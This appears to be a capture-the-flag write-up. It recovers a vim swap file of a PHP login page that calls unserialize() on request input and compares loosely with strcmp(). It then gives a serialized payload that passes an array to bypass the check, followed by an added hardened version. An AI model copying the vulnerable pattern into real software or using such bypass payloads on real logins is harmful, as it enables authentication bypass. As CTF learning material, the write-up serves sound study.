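I've forgotten the exact challenge description; in any case, it said that Xiao Ming was writing login.php and the power went out before he finished.
From that hint, the task is to find a backup file: locate .login.php.swp and download it. Opening it directly doesn't work; it has to be put on a Linux machine, then run vim login.php and choose recover to open it normally.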

    <?php
    $username = "flag_is_my_life";
    $password = "I_won't_tell_you_it's_here";
    $replacement = "Unless you trade in gold";
    include "flag.php";
    // Request parameter, passed straight to unserialize()
    $give_me = isset($_GET['give_me']) ? $_GET['give_me'] : "";
    $data = unserialize($give_me);
    // Loose (==) comparisons; $replace is never defined above ($replacement is)
    if ($data['username'] == $username && $data['password'] == $password && strcmp($data['replace'], $replace) == 0) {
        echo $flag;
    } else {
        echo "Flag is my life, you can't take it from me!";
    }
    ?>

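This tests deserialization: the input must be an array in which username is flag_is_my_life and password is I_won't_tell_you_it's_here. strcmp is the special case: replace needs to be an array.
So construct the serialized string: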

    a:3:{s:8:"username";s:15:"flag_is_my_life";s:8:"password";s:26:"I_won't_tell_you_it's_here";s:7:"replace";a:0:{}}

This returns the flag.
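
A hardened form of the check, as an added example that is not part of the challenge or the original writeup: it parses JSON instead of calling unserialize() on request data and requires every field to be a string before comparing, so an array can never stand in for replace (before PHP 8, strcmp() given an array returns NULL, and NULL == 0 is true). The function name credentials_match and the use of $replacement's value as the intended third field are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not from the challenge): true only when every expected
// field is present as a string and matches exactly.
function credentials_match(string $raw, array $expected): bool
{
    // JSON instead of unserialize(): plain data only, no PHP object
    // instantiation driven by request input. Depth is capped at 4.
    $data = json_decode($raw, true, 4);
    if (!is_array($data)) {
        return false;
    }
    $ok = true;
    foreach ($expected as $key => $want) {
        $got = $data[$key] ?? null;
        // Reject arrays, ints, bools and null up front, so a non-string
        // value never reaches a comparison function at all.
        if (!is_string($got)) {
            $ok = false;
            continue;
        }
        // hash_equals() compares strings strictly and in constant time.
        $ok = hash_equals($want, $got) && $ok;
    }
    return $ok;
}

// Expected values, taken from the constants in the listing above
// (assumption: the third field was meant to equal $replacement).
$expected = [
    'username' => "flag_is_my_life",
    'password' => "I_won't_tell_you_it's_here",
    'replace'  => "Unless you trade in gold",
];

// Constructed inputs: an array where a string belongs, a fully correct
// triple, and a string that is not JSON at all.
$arrayInput = json_encode(['replace' => []] + $expected);
$goodInput  = json_encode($expected);

var_dump(credentials_match($arrayInput, $expected));
var_dump(credentials_match($goodInput, $expected));
var_dump(credentials_match('not json', $expected));
```

Only the second call passes; the array-typed replace and the malformed input are both rejected before any comparison runs.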